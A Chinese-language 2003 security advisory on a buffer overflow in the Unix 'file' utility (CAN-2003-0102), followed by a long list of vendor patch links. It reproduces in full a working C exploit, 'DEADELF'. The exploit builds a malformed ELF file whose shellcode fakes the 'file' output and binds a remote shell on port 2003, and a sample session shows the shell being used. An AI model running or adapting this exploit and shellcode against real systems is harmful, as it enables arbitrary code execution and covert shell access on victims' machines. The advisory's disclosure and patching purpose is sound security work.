File工具本地缓冲区溢出漏洞发布时间:2003-03-04 更新时间:2003-03-21 严重程度:高 威胁程度:本地拒绝服务 错误类型:边界检查错误 利用方式:客户机模式 BUGTRAQ ID:7009 CVE(CAN) ID:CAN-2003-0102 受影响系统 file file 3.28详细描述 file程序存在一个内存分配的漏洞。攻击者可以利用这个漏洞进行拒绝服务攻击,甚至以运行file程序的用户身份执行任意代码。 该漏洞目前还没有该漏洞的细节。 测试代码 CrZ <crazy_einstein@yahoo.com> 和 LimpidByte <lbyte.void.ru>提供如下的测试方法。 /* \ __________________ / Black Sand Project \ __________________ / \ Created by CrZ [crazy_einstein@yahoo.com] LimpidByte [lbyte.void.ru] /06.03.2003/ / \ Bug discovered by iDEFENCE: http://www.idefense.com/advisory/03.04.03.txt / \ program name: DEADELF / \ description: Exploit for file program <= 3.39 / \ info: program create file-exploit and when you / make "file /path/to/this/file-exploit" shell \ will open on 2003 port. / \ Usage: ./85deadelf <file-exploit> [return address] / \ Example of work: / \ [crz@blacksand crz]$ gcc -o 85deadelf 85deadelf.c / [crz@blacksand crz]$ ./85deadelf deadelf \ [+] Creating a evil file deadelf! / [+] Using address of shellcode = 0xbfffbd40 \ [crz@blacksand crz]$ file deadelf / File: ASCII text \ [crz@blacksand crz]$ telnet localhost 2003 / Trying 127.0.0.1... \ Connected to blacksand (127.0.0.1). / Escape character is '^]'. \ id; / uid=500(crz) gid=500(crz) groups=500(crz) \ : command not found / exit; \ Connection closed by foreign host. / [crz@blacksand crz]$ \ / Tested against: file-3.37 (RedHat8.0) \ file-3.38 (RedHat8.0) */ #include <fcntl.h> #include <elf.h> #include <stdio.h> void usage(char *prog) { printf("\nCreated by CrZ [crazy_einstein@yahoo.com] Limpid Byte [lbyte.void.ru]\n"); printf("Usage: %s <name of evil file> [return address]\n\n",prog); exit(0); } int main(int argc, char **argv) { /* \ a simple shellcode that show fake result of file program & bind / shell on 2003 port by CrZ */ char shellcode[]= "\x31\xc0\x31\xdb\x53\xb3\x01\x50" /* write(1,"File: ASCII text");*/ "\x68\x01\x01\x0a\x0d\x68\x74\x65" "\x78\x74\x68\x43\x49\x49\x20\x68" "\x3a\x20\x41\x53\x68\x46\x69\x6c" "\x65\x89\xe1\xb2\x18\xb0\x04\xcd\x80" /* bind shell on 2003 port */ "\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80" "\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d" "\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16" "\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10" "\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45" "\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41" "\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" "\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; int fd,i; Elf32_Ehdr elfhdr; long xret=0xbfffbd40; char *evilfile="bl00mps"; char tmp[100]; if(!argv[1]) usage(argv[0]); else evilfile=argv[1]; if(argv[2]) sscanf(argv[2],"0x%x",&xret); printf("[+] Creating a evil file %s!\n",evilfile); printf("[+] Using address of shellcode = 0x%x\n",xret); sprintf(tmp,"echo>%s",evilfile); system(tmp); fd=open(evilfile,O_WRONLY); bzero(&elfhdr,sizeof elfhdr ); elfhdr.e_type=1; //type should by NOT ET_CORE (4) & NOT ET_EXEC (2) sprintf(elfhdr.e_ident,"\x7f\x45\x4c\x46\x01\x01\x01"); //ELF32 FORMAT elfhdr.e_machine=1; elfhdr.e_version=1; elfhdr.e_entry=0; elfhdr.e_phoff=0; elfhdr.e_shoff=0; elfhdr.e_flags=0; elfhdr.e_ehsize=0; elfhdr.e_phentsize=0xfff; //define size for read() elfhdr.e_phnum=1; //this is for stop for() loop when read() elfhdr.e_shentsize=0xfff; //define size for read() elfhdr.e_shnum=1; //this is for stop for() loop when read() elfhdr.e_shstrndx=0; write(fd,&elfhdr,sizeof(elfhdr)); for(i=0;i<20;i++) write(fd,&xret,4); //write new return address for(i=0;i<6000;i++) write(fd,"\x90",1); //write nops write(fd,&shellcode,sizeof shellcode); //write shellcode close(fd); return 0; } 解决方案 file file 3.28: Red Hat Upgrade file-3.39-8.6x.i386.rpm ftp://updates.redhat.com/6.2/en/os/i386/file-3.39-8.6x.i386.rpm Debian Upgrade file_3.28-1.potato.1_alpha.deb http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_alpha.deb Debian 2.2 (potato) Debian Upgrade file_3.28-1.potato.1_arm.deb http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_arm.deb Debian 2.2 (potato) Debian Upgrade file_3.28-1.potato.1_i386.deb http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_i386.deb Debian 2.2 (potato) Debian Upgrade file_3.28-1.potato.1_m68k.deb http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_m68k.deb Debian 2.2 (potato) Debian Upgrade file_3.28-1.potato.1_powerpc.deb http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_powerpc.deb Debian 2.2 (potato) Debian Upgrade file_3.28-1.potato.1_sparc.deb http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_sparc.deb Debian 2.2 (potato) file file 3.30: Red Hat Upgrade file-3.39-8.7x.i386.rpm ftp://updates.redhat.com/7.0/en/os/i386/file-3.39-8.7x.i386.rpm file file 3.32: MandrakeSoft Upgrade file-3.41-1.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Single Network Firewall 7.2 MandrakeSoft Upgrade file-3.41-1.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Linux-Mandrake 7.2 Trustix Upgrade file-3.41-1tr.i586.rpm ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/file-3.41-1tr.i586.rpm Trustix Upgrade file-3.41-1tr.i586.rpm ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/file-3.41-1tr.i586.rpm S.u.S.E. Upgrade file-3.33-85.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/7.3/a1/file-3.33-85.i386.rpm SuSE-7.3 S.u.S.E. Upgrade file-3.33-85.src.rpm ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/file-3.33-85.src.rpm SuSE-7.3 S.u.S.E. Upgrade file-3.32-118.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/7.1/a1/file-3.32-118.i386.rpm SuSE-7.1 S.u.S.E. Upgrade file-3.32-118.src.rpm ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/file-3.32-118.src.rpm SuSE-7.1 S.u.S.E. Upgrade file-3.32-69.alpha.rpm ftp://ftp.suse.com/pub/suse/axp/update/7.1/a1/file-3.32-69.alpha.rpm SuSE-7.1 S.u.S.E. Upgrade file-3.32-69.src.rpm ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/file-3.32-69.src.rpm SuSE-7.1 S.u.S.E. Upgrade file-3.32-36.ppc.rpm ftp://ftp.suse.com/pub/suse/ppc/update/7.1/a1/file-3.32-36.ppc.rpm SuSE-7.1 S.u.S.E. Upgrade file-3.32-36.src.rpm ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/file-3.32-36.src.rpm SuSE-7.1 file file 3.33: Red Hat Upgrade file-3.39-8.7x.i386.rpm ftp://updates.redhat.com/7.1/en/os/i386/file-3.39-8.7x.i386.rpm S.u.S.E. Upgrade file-3.33-39.sparc.rpm ftp://ftp.suse.com/pub/suse/sparc/update/7.3/a1/file-3.33-39.sparc.rpm SuSE-7.3 S.u.S.E. Upgrade file-3.33-39.src.rpm ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/file-3.33-39.src.rpm SuSE-7.3 S.u.S.E. Upgrade file-3.33-69.ppc.rpm ftp://ftp.suse.com/pub/suse/ppc/update/7.3/a1/file-3.33-69.ppc.rpm SuSE-7.3 S.u.S.E. Upgrade file-3.33-69.src.rpm ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/file-3.33-69.src.rpm SuSE-7.3 file file 3.34: MandrakeSoft Upgrade file-3.41-1.1mdk.ppc.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.0/PPC MandrakeSoft Upgrade file-3.41-1.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.0 file file 3.35: Red Hat Upgrade file-3.39-8.7x.ia64.rpm ftp://updates.redhat.com/7.2/en/os/ia64/file-3.39-8.7x.ia64.rpm Red Hat Upgrade file-3.39-8.7x.i386.rpm ftp://updates.redhat.com/7.2/en/os/i386/file-3.39-8.7x.i386.rpm Trustix Upgrade file-3.41-1tr.i586.rpm ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/file-3.41-1tr.i586.rpm file file 3.36: MandrakeSoft Upgrade file-3.41-1.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.1 MandrakeSoft Upgrade file-3.41-1.1mdk.ia64.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.1/IA64 file file 3.37: file Upgrade file-3.41.tar.gz ftp://ftp.gw.com/mirrors/pub/unix/file/file-3.41.tar.gz MandrakeSoft Upgrade file-3.41-1.1mdk.ppc.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.2/PPC MandrakeSoft Upgrade file-3.41-1.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.2 Red Hat Upgrade file-3.39-9.i386.rpm ftp://updates.redhat.com/8.0/en/os/i386/file-3.39-9.i386.rpm Red Hat Upgrade file-3.39-8.7x.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/file-3.39-8.7x.i386.rpm Debian Upgrade file_3.37-3.1.woody.1_alpha.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_alpha.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_arm.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_arm.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_hppa.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_hppa.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_i386.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_i386.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_ia64.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_ia64.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_m68k.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_m68k.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_mips.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_mips.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_mipsel.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_mipsel.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_powerpc.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_powerpc.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_s390.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_s390.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_sparc.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_sparc.deb Debian 3.0 (woody) S.u.S.E. Upgrade file-3.37-206.i586.rpm ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/file-3.37-206.i586.rpm SuSE-8.1 S.u.S.E. Upgrade file-3.37-206.i586.patch.rpm ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/file-3.37-206.i586.patch.rpm SuSE-8.1 S.u.S.E. Upgrade file-3.37-206.src.rpm ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/file-3.37-206.src.rpm SuSE-8.1 S.u.S.E. Upgrade file-3.37-206.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/8.0/a1/file-3.37-206.i386.rpm SuSE-8.0 S.u.S.E. Upgrade file-3.37-206.i386.patch.rpm ftp://ftp.suse.com/pub/suse/i386/update/8.0/a1/file-3.37-206.i386.patch.rpm SuSE-8.0 S.u.S.E. Upgrade file-3.37-206.src.rpm ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/file-3.37-206.src.rpm SuSE-8.0 file file 3.39: OpenPKG RPM file-3.39-1.1.2.src.rpm ftp://ftp.openpkg.org/release/1.1/UPD/file-3.39-1.1.2.src.rpm OpenPKG RPM file-3.39-1.2.1.src.rpm ftp://ftp.openpkg.org/release/1.2/UPD/file-3.39-1.2.1.src.rpm file Upgrade file-3.41.tar.gz ftp://ftp.gw.com/mirrors/pub/unix/file/file-3.41.tar.gz MandrakeSoft Upgrade file-3.41-1.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 9.0 MandrakeSoft Upgrade file-3.41-1.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Corporate Server 2.1 file file 3.40: OpenPKG RPM file-3.41-20030228.src.rpm ftp://ftp.openpkg.org/current/SRC/file-3.41-20030228.src.rpm file Upgrade file-3.41.tar.gz ftp://ftp.gw.com/mirrors/pub/unix/file/file-3.41.tar.gz EnGarde Upgrade file-3.41-1.0.2.i386.rpm ftp://ftp.engardelinux.org/pub/engarde/stable/updates/i386/file-3.41-1.0.2.i386.rpm EnGarde Upgrade file-3.41-1.0.2.src.rpm ftp://ftp.engardelinux.org/pub/engarde/stable/updates/SRPMS/file-3.41-1.0.2.src.rpm EnGarde Upgrade file-3.41-1.0.2.i686.rpm ftp://ftp.engardelinux.org/pub/engarde/stable/updates/i686/file-3.41-1.0.2.i686.rpm 相关信息 报告:Jeff Johnson 相关信息:http://online.securityfocus.com/advisories/5078 http://online.securityfocus.com/advisories/5088 http://online.securityfocus.com/advisories/5074 http://online.securityfocus.com/advisories/50 |
